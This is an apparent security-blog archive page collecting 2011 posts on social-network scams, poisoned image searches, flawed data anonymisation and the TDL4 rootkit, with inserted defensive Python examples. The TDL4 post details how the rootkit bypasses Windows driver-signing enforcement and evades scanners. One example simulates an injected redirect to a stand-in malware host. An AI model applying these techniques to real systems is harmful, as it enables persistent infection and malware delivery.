Author Archives | CSA

Google+ Project Vs Facebook Safety Features

Today there are many social networks on the internet, and new ones with new and better features are introduced every day. They have unique and useful features that make it easy for users to stay up to date with friends. They also offer apps for different smartphones, providing even easier access to friends and other useful information. But at the same time, these contacts and important details are at risk if the security features are compromised.

Google Vs Facebook

Google and Facebook are two popular corporations offering online social networks and other useful applications. Over the past few years Facebook has gained significant recognition and has attracted a large number of users from around the world. These users share their private information on the web. There are security features that restrict strangers from accessing personal information, but exposing personal data online is still a risk.

Google, on the other hand, is a popular search engine that is now stepping into the world of social networks and has started offering new products such as +1, Hangouts and more.

But when comparing these two popular corporations, a widely asked question is about their safety. Personal information can do serious harm if it gets into the wrong hands. Users can restrict others from viewing information by changing their privacy settings. For instance, Facebook lets users apply “friends only” and “friends of friends” settings to their content, which users can select according to their requirements.

Facebook users can also create groups, set privacy settings on them, and add friends and family to these groups. For instance, if someone wants to allow a group of people to view a photo album, it is good to create a group and allow only that group to view the photos or albums.

Google+ Project

Google launched a project named Google+, which comprises several smaller projects such as Google Circles. It is a social network, and its “circles” offer the same kind of security feature as Facebook’s groups. The Google+ project comprises a number of projects such as Hangouts, +1, Circles, Sparks and more. All these applications are interconnected across the web, with Google’s search engine, social networking, likes and video chat. With such a large online project, users are more exposed to the risk of information getting into the wrong hands.

To cope with security risks, Google launched different panels to advise users about secure content sharing, such as the Google Family Safety Center, which allows parents to control their children’s activities. Parents can also contact Google’s advice board to find the help they want. It is also important to remain cautious about malicious invitations and software downloads. For instance, Google Hangouts requires installing Adobe Air on the system. It is important to download such applications only from authentic or official websites.

Facebook Risks

Facebook is a great way to connect with friends and family, but at the same time there are also bad guys getting social on Facebook. An IT security firm reports that users are being spammed or sent malicious code. Facebook offers good security features to restrict strangers from accessing personal information, but unethical activities are still on the rise.

Posted in Facebook, Featured, Security

PSN update now live across the U.S., go change your password now

psn-password-change-screen

In case you missed it — and you very well might have considering what time this ball got rolling — Sony has officially flipped the switch on the PlayStation Network, restoring service in a limited capacity, and a gradually filling map of the United States charted the progress of the rollout through the night. The map is now fully green, which means firmware update version 3.61 is now available for download to all U.S. users. In addition to online gameplay, the update brings back video rental playback, Music Unlimited on Qriocity, Netflix/Hulu access, Friends Lists, chat, Trophy comparison and PlayStation Home.

The update is a zippy download and installation as of 9:30 a.m. eastern time today, taking no more than 10 minutes to load into your console and do its thing. We’ll see if that changes as more of the country wakes up and tries to bring PS3s back online. In order to complete the update installation, you’ll need to change your password. Not that you wouldn’t want to, since… you know… your private information was compromised and stuff. That said, the real safeguards built into 3.61 are presumably under the hood, since even the most complex password won’t do you a lick of good if all of your info is stolen from the network servers again.

Sony no doubt wants to put this whole unfortunate affair behind it, but there will very likely need to be an extended healing period before consumer confidence can be restored. “Welcome Back” promotions and the like are all well and good, but only time is going to make this mess go away. Look at Microsoft and the whole “Red Ring of Death” circus; slightly different situation but with a similar reach. Both companies made mistakes before stepping up and doing what needed to be done; like Microsoft, Sony’s got a large enough user base that a return to business as usual is a certainty, even if it does take some time.

After all, that new Call of Duty: Black Ops map pack is going to come to PSN at SOME point.

Posted in Security

Poisoned Google image searches becoming a problem

If you are a regular user of Google’s search engine you might have noticed that poisoned search results have practically become a common occurrence.

Google has, of course, noticed this and does its best to mark the offending links as such, but it still has trouble when it comes to cleaning up its image search results.

ISC’s Bojan Zdrnja took it upon himself to explain how the attackers actually do it, and shows that it is actually rather simple.

For one, they attack and compromise a great variety of legitimate websites – usually those that run WordPress, since it often has vulnerabilities that can be easily exploited and its users are often lax about updating it.

Then they insert PHP scripts into the sites’ source code. “These scripts vary from simple to very advanced scripts that can automatically monitor Google trend queries and create artificial web pages containing information that is currently interested. That is actually how they generate new content – if you ever wondered how they had those web sites about Bin Laden up quickly it is because they automatically monitor the latest query trends and generate web pages with artificial content,” he explains.

They also harvest other sites for images, and embed them into the site. When the scripts detect Google’s crawlers, they deliver to them pages containing the automatically generated content, and the pictures end up in the image search database.

“The exploit happens when a user clicks on the thumbnail,” says Zdrnja. “Google now shows a special page that shows the thumbnail in the center of the page, links to the original image (no matter where it is located) on the right and the original web site (the one that contained the image) in the background.”

Google displays all of this in an iframe, and the browser automatically sends a request to the compromised page. The PHP script inserted in it checks whether the user has come from a Google results page, and if so, it serves another script – this time a JavaScript one – that redirects the browser to another compromised site that serves malware.

Users should be careful about what they click, but sometimes it is hard to detect malicious links. Zdrnja advises the use of browser add-ons such as NoScript for Firefox, but believes that Google could help by not using an iframe to display the results.
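The two behaviours Zdrnja describes (feeding the crawler generated content, and redirecting only visitors who arrive from Google) can be checked for by a site owner or analyst by fetching the same URL under different request headers and comparing the answers. The following is an added example, not code from the article or from ISC; the `fetch` callable is an injection point that would normally wrap an HTTP client, and the in-memory stand-in site below is constructed so the check runs offline.

```python
"""Detect crawler- and referer-dependent cloaking of the kind described above."""
import re
from typing import Callable, Dict

# Patterns that indicate a client-side redirect; a page that shows one only to
# Google-referred visitors is the fingerprint described in the article.
JS_REDIRECT = re.compile(
    r"(window\.location|document\.location|location\.href|location\.replace)\s*[=(]",
    re.IGNORECASE,
)
META_REFRESH = re.compile(r"<meta[^>]+http-equiv=[\"']?refresh", re.IGNORECASE)

GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 6.1) Firefox/4.0"
GOOGLE_REFERER = "http://www.google.com/imgres?imgurl=http://example.org/x.jpg"


def has_client_redirect(body: str) -> bool:
    """True if the HTML contains a JavaScript or meta-refresh redirect."""
    return bool(JS_REDIRECT.search(body) or META_REFRESH.search(body))


def detect_cloaking(url: str, fetch: Callable[[str, Dict[str, str]], str]) -> dict:
    """Fetch `url` three ways and report which cloaking indicators are present.

    fetch(url, headers) must return the response body as text.
    """
    plain = fetch(url, {"User-Agent": BROWSER_UA})
    as_bot = fetch(url, {"User-Agent": GOOGLEBOT_UA})
    from_google = fetch(url, {"User-Agent": BROWSER_UA, "Referer": GOOGLE_REFERER})
    return {
        # The crawler is shown a different page than a normal visitor.
        "crawler_cloaking": as_bot != plain,
        # Only visitors arriving from Google get a client-side redirect.
        "referer_redirect": has_client_redirect(from_google)
        and not has_client_redirect(plain),
    }


# --- constructed stand-in for a compromised site, so the check runs offline ---
REAL_PAGE = "<html><body><h1>Our bakery</h1><p>Opening hours ...</p></body></html>"
GENERATED_PAGE = ("<html><body><h1>latest trending topic</h1>"
                  "<img src='http://victim.example/harvested.jpg'></body></html>")
REDIRECT_PAGE = "<html><script>window.location='http://malware.example/';</script></html>"


def fake_compromised_site(url: str, headers: Dict[str, str]) -> str:
    """Mimics the decisions of the injected script (constructed, not real code)."""
    if "Googlebot" in headers.get("User-Agent", ""):
        return GENERATED_PAGE          # crawler gets auto-generated content and images
    if "google." in headers.get("Referer", ""):
        return REDIRECT_PAGE           # Google visitors get bounced elsewhere
    return REAL_PAGE                   # everyone else sees the legitimate site


def fake_clean_site(url: str, headers: Dict[str, str]) -> str:
    """A site that serves the same page to everyone."""
    return REAL_PAGE


if __name__ == "__main__":
    print("compromised:", detect_cloaking("http://site.example/", fake_compromised_site))
    print("clean:", detect_cloaking("http://site.example/", fake_clean_site))
```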

Posted in Security

Facebook scammers go back to using Javascript

Facebook scammers know that in order to keep users falling for their scams, they have to use a variety of approaches.

For example, there was a time when rogue applications were the scammers’ preferred method of making sure that the scheme propagated through the social network. Before that, they were more partial to trying to make users copy/paste scripts into their address bars in order to achieve the same result.

As users become accustomed to ignoring one particular approach – and as Facebook becomes more adept at spotting and blocking the rogue apps – the copy/paste script approach makes a comeback.

The most popular lure used by these scammers is the undying “See who viewed your profile” offer. The landing page could be a Facebook page or one hosted on another domain, and it asks the user to copy some JavaScript into the browser address bar and press “Enter”.


And just in case the user does not understand the instructions, the scammers have attached a video of the whole process. Once the directions are followed, the user is (predictably) asked to fill out a survey in order to finally get the results. In the meantime, the JavaScript works its magic.

“Depending on the configurations of the attacker, the script will post a new bait message to the user’s wall, send chat messages to friends, tag you in post messages or images, or even create an event and send an invitation to all your friends,” explains Symantec.

“Of course as always the attack is easy configurable through a toolkit. Since the script runs in the context of Facebook and uses your open session it can do a lot with your profile, it can do nearly everything you could do yourself.”

Posted in Security

Malware sites already capitalizing on announcement of Osama Bin Laden’s Death

Within hours of the announcement of Osama Bin Laden’s death, we are already seeing malicious sites emerge to capitalize on the news. One Spanish-language site displays a purported photo of a dead Osama Bin Laden and includes a story about the US-led operation. Farther down the page, the reader is presented with a Flash Player window with a message indicating that the user must first update a VLC plugin (VLC is a popular media player) in order to view the video. When the user clicks on the link, they download a file titled XvidSetup.exe. This file is actually a popular adware tool known as Hotbar. At present, 19 of 41 antivirus engines block the file.

Sadly, there will be no shortage of scams taking advantage of this historic global news. Users should use caution any time a site claims to be offering video or photos related to this news.

- michael

Posted in Security

Tom Tom sounds the privacy drum – road safety or no road safety!

Dutch GPS and navigation software giant, Tom Tom, recently took what I consider to be a small privacy step for the company, but a giant privacy step for mankind.

Faced with evidence that the Dutch police have been using anonymised trip data from Tom Tom users to assist in enforcing speeding laws, Tom Tom CEO Harold Goddijn last week published an official comment on YouTube.

In the video, Goddijn said:

We learned today…that the police in the Netherlands are using [our] information to identify road stretches where people in general, and on average, are driving too fast. They use [our data] to put up speed cameras and speed traps. And we don’t like that, because our customers don’t like it. We will prevent that type of usage of our data in the future.

Tom Tom seems to be recognising some potential privacy-eroding issues which other companies don’t or haven’t concerned themselves with in the past. (Not all viewers of the YouTube video agree with me – there are currently 34 dislikes but only 26 likes.)

Even so-called anonymous data, collected in good faith, may end up being anything but.

Possibly the most infamous, and outrageous, anonymity gaffe in recent history was perpetrated by AOL nearly five years ago. The company published some 20 million search terms – supposedly for web research purposes – with usernames replaced with arbitrary numbers.

The problem was that each username was replaced with the same number every time it appeared. The result ought to have been foreseen.

As you accumulate more and more search terms tied to specific individuals, you can make ever-more accurate deductions about their identities from the search terms alone.

After all, over months of searching, you probably give away multiple hints about your identity. You might narrow down where you live by repeatedly searching for businesses in your neighbourhood. You might search for cohorts from your school or college. You might check garbage collection dates in your street. You might even do a vanity search for your own name or property, which, in the AOL data, would have been the privacy-erosion equivalent of “Bingo!”

Indeed, the New York Times famously traced Thelma Arnold, and her dog Dudley, right to her home in Georgia by reversing the AOL search data to remove her anonymity altogether.

Google, too, is no stranger to controversy over its definition of anonymise. Google is proud of the fact that it “anonymises” IP addresses in its search logs after nine months, even though this involves simply blanking out the bottom eight bits of your IP address.

This just about sneaks into the definition of anonymise given in my New Oxford American Dictionary, namely: to “remove identifying particulars from test results for statistical or other purposes”. But it might not meet your definition. You probably assume that an anonymised log entry can’t be connected with you at all.

Keeping the actual details of every search term – even ones which actually include your name, or your address, or some sort of personally identifiable information – isn’t really anonymous. Tying these searches together with an IP identifier which narrows you down to 1 in 256 people (at the very best – many /24 networks are only sparsely populated, after all), and which probably identifies your ISP, your suburb and your phone exchange, is even worse.
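The two “anonymisation” schemes discussed above, applied to a constructed search log, as an added example that is not part of the original post: blanking the bottom eight bits of an IPv4 address as the article says Google does, and the effect of replacing a username with the same fixed number every time (the AOL release) compared with a keyed token that changes each period. The log records, the usernames and the secret key are all constructed for the demo.

```python
"""Compare IP masking and two pseudonymisation schemes on a constructed search log."""
import hashlib
import hmac
import ipaddress
from collections import Counter
from typing import Dict, Iterable, List, Tuple


def mask_ipv4_low8(ip: str) -> Tuple[str, int]:
    """Zero the low 8 bits; returns (masked address, number of hosts sharing it)."""
    addr = ipaddress.IPv4Address(ip)
    masked = ipaddress.IPv4Address(int(addr) & ~0xFF)
    return str(masked), 2 ** 8   # 256 addresses collapse onto one log entry


def fixed_token(user: str, table: Dict[str, int]) -> str:
    """AOL-style: the same arbitrary number replaces the username every time."""
    if user not in table:
        table[user] = len(table) + 1
    return str(table[user])


def rotating_token(user: str, period: str, key: bytes) -> str:
    """Keyed, per-period token: HMAC-SHA256(key, period || user), truncated.

    The same user gets the same token within one period and an unrelated
    token in another, so an observer without the key can only link queries
    made in the same period.
    """
    return hmac.new(key, f"{period}|{user}".encode(), hashlib.sha256).hexdigest()[:12]


# Constructed log: (username, day, query). 'alice' searches three times over two days.
SEARCH_LOG: List[Tuple[str, str, str]] = [
    ("alice", "2011-05-01", "garbage collection dates elm street"),
    ("alice", "2011-05-01", "bakery near elm street"),
    ("alice", "2011-05-02", "alice example"),        # the vanity search
    ("bob",   "2011-05-01", "weather"),
    ("bob",   "2011-05-02", "bob example"),
]


def max_linkable_queries(tokens: Iterable[str]) -> int:
    """How many queries an observer can tie to a single pseudonym at most."""
    return max(Counter(tokens).values())


def linkage_under_fixed_tokens(log=SEARCH_LOG) -> int:
    """Every query by the same user shares one number: all of them link."""
    table: Dict[str, int] = {}
    return max_linkable_queries(fixed_token(u, table) for u, _, _ in log)


def linkage_under_rotating_tokens(log=SEARCH_LOG,
                                  key: bytes = b"constructed-demo-key") -> int:
    """Tokens rotate daily: only same-day queries link."""
    return max_linkable_queries(rotating_token(u, day, key) for u, day, _ in log)


if __name__ == "__main__":
    print(mask_ipv4_low8("203.0.113.77"))
    print("fixed tokens link up to", linkage_under_fixed_tokens(), "queries per person")
    print("rotating tokens link up to", linkage_under_rotating_tokens(), "queries per person")
```

Even the rotating scheme leaves the query text itself in the clear, which is the article's main point: a vanity search identifies its author regardless of how the username was replaced.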

So, be careful out there. Anonymised data may not be as anonymous as you thought. And anonymised data which you share with a vendor – such as your average speed across the Sydney Harbour Bridge, where you’re supposed to keep below 70km/hr – might end up getting used for purposes you wouldn’t consider “anonymous”.

Unless you are absolutely certain what will be shared, and how, and for what purpose, I recommend that you turn such sharing features off. And if a product or service requires data sharing to work at all, don’t buy into it in the first place.

At the very least, before enabling any “share data with vendor” option, ask yourself, and the vendor, what’s in it for you – in other words, work out the best result you can ever expect from the sharing. Contrast that value with what’s in it for the vendor, or for the intelligence services and law enforcement authorities in that vendor’s jurisdiction.

Make sure there is an obvious positive balance in your favour.

If there isn’t, then the vendor simply isn’t paying you enough for your data. It really is a commercial transaction!

Posted in Sophos

Osama bin Laden dead – so watch for the spams and scams

Google’s top-trending Anglophone search term right now is, understandably, “osama bin laden dead”.

Google officially describes its hotness (you couldn’t make this stuff up) as volcanic.

The short version, according to the LA Times, is that bin Laden was tracked to a “comfortable mansion surrounded by a high wall in a small town near Islamabad, Pakistan’s capital.”

For bin Laden, it seems, the comfort is no more. “On Sunday, a ‘small team’ of Americans raided the compound. After a firefight, [President Obama], they killed Bin Laden.” Apparently, DNA tests have confirmed Bin Laden’s identity.

And there you have it.

Now you know – so you don’t need to click on any of the links you’re likely to see in email or on social networking sites offering you additional coverage of this newsworthy event.

Many of the links you see will be perfectly legitimate links. But at least some are almost certain to be dodgy links, deliberately distributed to trick you into hostile internet territory.

If in doubt, leave it out!

And even well-meant searches using your favourite search engine might end in tears. What’s commonly called “Black-Hat Search Engine Optimisation” (BH-SEO) means that cybercrooks can often trick the secret search-ranking algorithms of popular search engines by feeding them fake pages to make their rotten content seem legitimate, and to trick you into visiting pages which have your worst interests at heart.

Well-known topics that have been widely written about for years are hard to poison via BH-SEO. The search engines have a good historical sense of which sites are likely to be genuinely relevant if your interest is searches like “Commonwealth of Australia”, “Canadian Pacific Railway” or “Early history of spam”.

But a search term which is incredibly popular but by its very nature brand new – “Japanese tsunami”, “William and Kate engagement”, “Kate Middleton wedding dress” or, of course “Osama bin Laden dead” – doesn’t give the search engines much historical evidence to go on.

Of course, the search engines want to be known for being highly responsive to new trends – that means more advertising revenue for them, after all – and that means, loosely speaking, that they have to take more of a chance on accuracy.

What can you do to keep safe?

* Don’t blindly trust links you see online, whether in emails, on social networking sites, or from searches. If the URL and the subject matter don’t tie up in some obvious way, give it a miss.

* Use an endpoint security product which offers some sort of web filtering so you get early warning of poisoned content. (Sophos Endpoint Security and Control and the Sophos Web Appliance are two examples.)

* If you go to a site expecting to see information on a specific topic but get redirected somewhere unexpected – to a “click here for a free security scan” page, for instance, or to a survey site, or to a “download this codec program to view the video” page – then get out of there at once. Don’t click further. You’re probably being scammed.

Posted in Sophos

TDL4 rootkit is coming back stronger than before

Some months after our last blog post about the TDL rootkit, we have to come back and write again about this nasty threat, which targets both 32-bit and 64-bit versions of the Windows operating system, successfully bypassing all the security countermeasures implemented in the 64-bit version of Windows that should prevent the loading of unsigned drivers and any kind of patch to the Windows kernel.

We have written many times about this rootkit and its features, up to the latest release, called TDL4, which infects the Master Boot Record and patches in real time the Windows Boot Configuration Data and the kdcom.dll kernel debugging module. As already written in the previous blog post about TDL4, this rootkit is able to bypass the Windows Driver Signing enforcement by patching the Windows Boot Configuration Data and swapping the BcdLibraryBoolean_EmsEnabled value for the BcdOSLoaderBoolean_WinPEMode one.

This swap tells Windows to load itself in WinPE mode, thus disabling the driver signing checks and allowing unsigned drivers to be loaded in kernel mode. Winload.exe is the Windows executable responsible for loading the Windows kernel along with the libraries it needs, such as hal.dll and kdcom.dll. When loading such modules, Winload.exe reads the Boot Configuration Data to determine whether it has to check their digital signatures – the BcdOSLoaderBoolean_WinPEMode flag (and a couple more flags). After Winload.exe has loaded the Windows kernel, it hands the system loading procedure over to the kernel itself.

This is the behavior exploited by TDL4 until last April: a design flaw that allowed it to overwrite the kdcom.dll module with its own module, used to load the rootkit driver and disable kernel debugging. Then, after the rootkit driver has been loaded, the rootkit prevents Windows from actually booting in WinPE mode.

Winload.exe, if executed in WinPE mode, would normally pass the /MININT switch to the Windows kernel, telling it to load Windows in WinPE mode. To avoid this, the rootkit intercepts the /MININT string and changes it to IN/MINT. The Windows kernel doesn’t recognize this string and loads Windows normally, with the driver signing security feature enabled again.

This trick allowed the TDL4 rootkit to successfully infect x64 versions of Windows, until this April, when Microsoft silently released the KB2506014 patch, which the company describes as follows: “Microsoft is announcing the availability of an update to winload.exe to address an issue in driver signing enforcement. While this is not an issue that would require a security update, this update addresses a method by which unsigned drivers could be loaded by winload.exe. This technique is often utilized by malware to stay resident on a system after the initial infection”.

Microsoft patched the behavior of Winload.exe and the kdcom.dll module. The first now checks the code integrity and digital signature of the Windows kernel and its dependent modules regardless of whether the system is being booted in WinPE mode. The second has been patched to evade the TDL4 signature scan, which was able to detect when kdcom.dll was being loaded by the system. The TDL4 rootkit checked the data size of kdcom.dll’s PE export directory in the 32-bit release of Windows and of its PE resource directory in the 64-bit release. If the size was 0xFA, TDL4 assumed the file was kdcom.dll and began the infection routine. Microsoft patched the kdcom.dll module and changed the resource directory size to 0x110 to evade the TDL4 scan.

TDL4’s authors didn’t wait long and have just released an update to the TDL4 rootkit code, making a number of important changes that bypass the patch issued by Microsoft and a number of TDL rootkit scanners available online. It looks like this new TDL4 dropper is still in the development stage, because there are some bugs in the dropper code.

This new release of the TDL4 rootkit implements specific code to disable the driver signing security routine. As written before, since the latest Microsoft patch Winload.exe checks the digital signature of the kernel and its related modules. If the integrity check fails – e.g. with the rootkit’s patched kdcom.dll – the security routine returns the status error C0000428, which is STATUS_INVALID_IMAGE_HASH. If the routine returns this error, winload.exe stops the system boot and shows a security error.

To bypass this security check, the rootkit now intercepts these digital signature check routines and patches them so that instead of returning the NTSTATUS error C0000428 they return the NTSTATUS value 0000C428, which is a non-existent error code. Winload doesn’t recognize this value and proceeds with the system boot, effectively loading an unsigned, tampered module. To intercept the kdcom.dll load, the TDL4 rootkit has been updated to the new kdcom resource directory size value 0x110, neutralizing the Microsoft patch.
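The two details above are easy to verify on a file and a status value. The following added example (not code from the original post or from Prevx) reads the export-directory and resource-directory sizes from a PE header, the two values the post says TDL4 compares against 0xFA (and, after KB2506014, 0x110), so an analyst can see which kdcom.dll layout a system carries; it also shows why 0x0000C428 passes where 0xC0000428 fails: the NT_SUCCESS test only looks at the severity bits (the top two bits of an NTSTATUS), and the substituted value has them clear. The PE images used for the run are constructed minimal headers, not real kdcom.dll files.

```python
"""Read PE data-directory sizes and classify NTSTATUS values by severity."""
import struct
from typing import Dict

IMAGE_DIRECTORY_ENTRY_EXPORT = 0
IMAGE_DIRECTORY_ENTRY_RESOURCE = 2
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def pe_directory_sizes(image: bytes) -> Dict[str, int]:
    """Return the export and resource data-directory sizes of a PE image (32- or 64-bit)."""
    if image[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = e_lfanew + 4 + 20            # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic == PE32_MAGIC:            # PE32: NumberOfRvaAndSizes at +92, directories at +96
        ndirs_off, dirs_off = opt + 92, opt + 96
    elif magic == PE32PLUS_MAGIC:      # PE32+: 16 bytes later because ImageBase etc. are 64-bit
        ndirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    ndirs = struct.unpack_from("<I", image, ndirs_off)[0]

    def size_of(index: int) -> int:
        if index >= ndirs:
            return 0
        _rva, size = struct.unpack_from("<II", image, dirs_off + 8 * index)
        return size

    return {
        "bitness": 32 if magic == PE32_MAGIC else 64,
        "export_size": size_of(IMAGE_DIRECTORY_ENTRY_EXPORT),
        "resource_size": size_of(IMAGE_DIRECTORY_ENTRY_RESOURCE),
    }


def matches_tdl4_fingerprint(image: bytes, expected: int) -> bool:
    """Per the post: TDL4 compared the export size on 32-bit, the resource size on 64-bit."""
    info = pe_directory_sizes(image)
    field = "export_size" if info["bitness"] == 32 else "resource_size"
    return info[field] == expected


def nt_success(status: int) -> bool:
    """NT_SUCCESS(): severity is bits 31..30; 0 (success) and 1 (informational) pass."""
    return ((status >> 30) & 0b11) in (0, 1)


STATUS_INVALID_IMAGE_HASH = 0xC0000428   # severity 3: error, boot stops
PATCHED_STATUS = 0x0000C428              # value substituted by the rootkit (from the post)


def build_pe(magic: int, export_size: int, resource_size: int) -> bytes:
    """Constructed minimal PE header (DOS stub, signature, COFF header, optional header
    with 16 data directories); enough for header parsing, not a loadable image."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    std_fields = 96 if magic == PE32_MAGIC else 112
    opt_size = std_fields + 16 * 8
    machine = 0x14C if magic == PE32_MAGIC else 0x8664
    coff = struct.pack("<HHIIIHH", machine, 0, 0, 0, 0, opt_size, 0)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<I", opt, std_fields - 4, 16)          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, std_fields + 8 * IMAGE_DIRECTORY_ENTRY_EXPORT, 0x1000, export_size)
    struct.pack_into("<II", opt, std_fields + 8 * IMAGE_DIRECTORY_ENTRY_RESOURCE, 0x2000, resource_size)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    old64 = build_pe(PE32PLUS_MAGIC, 0x40, 0xFA)    # pre-KB2506014 resource size (per the post)
    new64 = build_pe(PE32PLUS_MAGIC, 0x40, 0x110)   # post-patch resource size
    print(pe_directory_sizes(old64), matches_tdl4_fingerprint(old64, 0xFA))
    print(pe_directory_sizes(new64), matches_tdl4_fingerprint(new64, 0x110))
    print(nt_success(STATUS_INVALID_IMAGE_HASH), nt_success(PATCHED_STATUS))
```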

To avoid being detected by some specific online public TDL4 rootkit scanners, the TDL4 team updated their miniport disk driver hook, changing how the rootkit devices are linked to the rootkit driver and the real hooked miniport driver. As we already know, the TDL4 rootkit steals the driver object of the last miniport driver and hijacks the disk driver’s DR0 device, attaching it to its own filtering device. By walking the rootkit driver’s chain of devices, it was trivial to get a pointer to the real hooked miniport driver object. This structure helped many tools spot the presence of the TDL rootkit active in the system. The current TDL4 release removes every reference to the hooked miniport driver object, bypassing many anti-rootkit TDL4 detection routines.

The team behind the TDL4 rootkit is still alive and working quietly to keep its creature up to date and able to bypass all known security restrictions. Even though the rootkit’s development cycle changed drastically and slowed down after the TDL3 period – mostly because of a major change in the development team – whoever is handling the rootkit’s development is still trying to keep the malware alive and effective against security software. Sadly, the first x64-compatible Windows kernel-mode rootkit has not disappeared; it is coming back stronger than before.

Posted in Prevx

Facebook Scam: ‘Wired News: iPhone 5 – First Exposure’ leads to Adware

From likejacking to photo-tagging, Facebook scammers are constantly searching for new ways to get their scam campaigns to spread through the social network. Early this weekend, we observed a new type of scam, this one leveraging Facebook’s new social plugin that lets websites host comments. Scammers are exploiting it to get their rogue websites visible in users’ news feeds, because for a scammer, the more eyeballs that see these posts the better.

Familiar Justin Bieber scam returns in a new form

There are various flavors of this scam making the rounds. The newest one focuses on a familiar Apple product: the iPhone. With rumors circulating about the iPhone 5, loyal Apple followers are drawn to the various news articles that cover these stories, so it’s no surprise that scammers have decided to piggyback on this for their latest scam.

iPhone 5 Scam spreading on Facebook

The scam begins with someone in your social network “commenting” on a post like the one above. The post claims to be from Wired News and has one of those headlines designed to lure a user into clicking on the link.

iPhone 5 - Scam Page

Once a user clicks on the link, they are redirected to a random .info site; over 10 of these have been in circulation for this particular scam. Before the user can click on anything, they are asked to complete a CAPTCHA-like verification form:

Human Verification overlay for Facebook Comments

This effectively tricks the user into entering the number 5, which actually results in the user leaving a comment on the .info website through the Facebook social plugin layer for comments. This is why users will see that ‘John Doe’ commented on randomsite.info in their Facebook News Feed.

iPhone 5 Scam Page: Download the 'Exposure' Video

Unlike most Facebook scams of late, at the end of this rainbow, there is no survey scam. Instead, the users are prompted to download an executable file.

Installer for 'videogameboxinstaller.exe'

The executable file is videogameboxinstaller.exe, and it is dubious in nature, as it downloads other pieces of software. “AnyLike” claims to allow users to “like” anything and everything on the web.

AnyLike Browser Application Installation

“PageRage” allows users to add style to their Facebook pages:

PageRage - Be sure to read the terms!

PageRage notes in its terms above that it will display ads to the end user. Sounds like adware? Four antivirus vendors agree, flagging this as Adware.Yontoo. This also seems to indicate that there is an affiliate program involved, and sure enough there is:

Details on how to become an affiliate for PageRage

At the heart of all these Facebook scams lies the same principle: a way for the scammers to make money by tricking users. Survey scams have been working quite well, so it makes sense that scammers would begin focusing their efforts on pay-per-install affiliate programs.

There are other Facebook comment scams (dubbed “comment-jacking”) making the rounds, including one offering free airline tickets aboard Southwest Airlines.

Southwest Airlines Comment-Jacking Scam

As we have advocated for many other Facebook scams, the key here is to be aware that scammers will do whatever it takes to make a fast buck on the backs of social networking users. That’s why they tend to jump on topics that might appeal to a user (Apple iPhone 5, Free Airline tickets, etc.).

If it looks too good to be true, there’s a very good chance that it is. Look out for the people who are part of your personal social network: friends and family members. Let them know about scams like these, because awareness remains a big piece of the puzzle.

Note: At the time this post was published, over 100,000 visits had been logged to the various links in circulation:

Over 100,000 Visits to the various scam pages

Posted in Security

2 FREE Southwest Airline Tickets!

Scam Signature Message: 2 FREE Southwest Airline Tickets!

southwest_wall

Scam Type: Click-Jacking, Bogus Offer

Trending: May 2011

Why it’s a Scam:

Clicking the wall post link takes you to the following page:

southwest_main

Clicking “Comment” click-jacks your account and presents the following bogus offer:

southwest_2

If you read the fine print, you must complete a total of 13 Sponsor Offers. Not only is this a ridiculous hoop to jump through that will cost you a lot of money in the end, but the scammers are also acquiring a treasure trove of your personal data. You will be required to provide your name, address, phone numbers and date of birth. This enables the shady marketers not only to spam your Facebook account, but also to harass you via snail mail, phone calls and text messages.

How to Deal with the Scam:

If you made the mistake of commenting on the main page, you are now spamming your friends with the scammer’s message. You should clean up your news feed and profile to remove references to the scam (click the “x” in the top right-hand corner of the post).

The level of damage control required will largely depend on how many “special offers” you participated in. If you submitted your name, address, email, etc., then be on the lookout for more bogus offers arriving in your email and regular mail. Also be on alert for identity theft attempts.

Posted in Facebook

Father walks in on his Daughter… EMBARRASIN!

Scam Signature Message: Father walks in on his Daughter… EMBARRASIN!

dadembarrasin_wall

Scam Type: Survey Scam, Click-Jacking

Trending: May 2011

Why it’s a Scam:

Clicking the wall post link takes you to the following page:

dadembarrasin_main

On this screen you really don’t have to click the right answer – any input will do. Clicking Submit click-jacks your account and loads the following survey scam:

dadposted_survey

Here we see the end game of a typical Facebook survey scam. Each time someone completes a survey, the scam creator gets a commission. The scam creator may also have your personal information and use it to do you harm (depending on the information you submitted in the survey). If you downloaded any games or other files, then your computer could be infected with a virus, trojan or other malware. Never download files from scams like this!

How to Deal with the Scam:

If you made the mistake of clicking “Submit” on the main page, you are now spamming your friends with the scammer’s message. You should clean up your news feed and profile to remove references to the scam (click the “x” in the top right-hand corner of the post).

If you made the mistake of submitting your cell phone number for any of the surveys, then you should contact your carrier immediately to keep any bogus charges from appearing.

If you downloaded files or games while completing the survey scam, then your computer could very well be infected with a virus. Install and/or update your anti-virus software and run a complete system scan.

Posted in Facebook

TDL4 revisited

I just saw an article by Mathew Schwartz for Information Week focused on a series of articles by Aleksandr Matrosov, Eugene Rodionov and myself for Infosec Institute.

The articles are actually based on previous analyses of TDL3 and TDL4 by Aleksandr and Eugene, but even if you’ve seen those, you might find the aggregation of older and newer information and the separation of the topics useful. Or not. :) Anyway, the subversion of 64-bit Windows is certainly still an interesting topic.

All three articles are linked on the white papers page at http://www.eset.com/us/documentation/white-papers:

TDSS part 1: The x64 Dollar Question

Considers and contrasts the distribution and installation of the TDL3 and TDL4 bootkits.

TDSS part 2: Ifs and Bots

Looks in more depth at the internals of the TDSS malware.

TDSS part 3: Bootkit on the other foot

The last part of the series describes the TDSS loading process.

Posted in ESET

Browser Updates

Just a few days ago, two major web browsers have been updated to fix security vulnerabilities which may allow attackers to infect the computer with malware just by visiting a hacked website.

Google released version 11 of the Chrome web browser. 18 of the more than 20 security holes closed with this release are rated “high” severity by the Google developers.

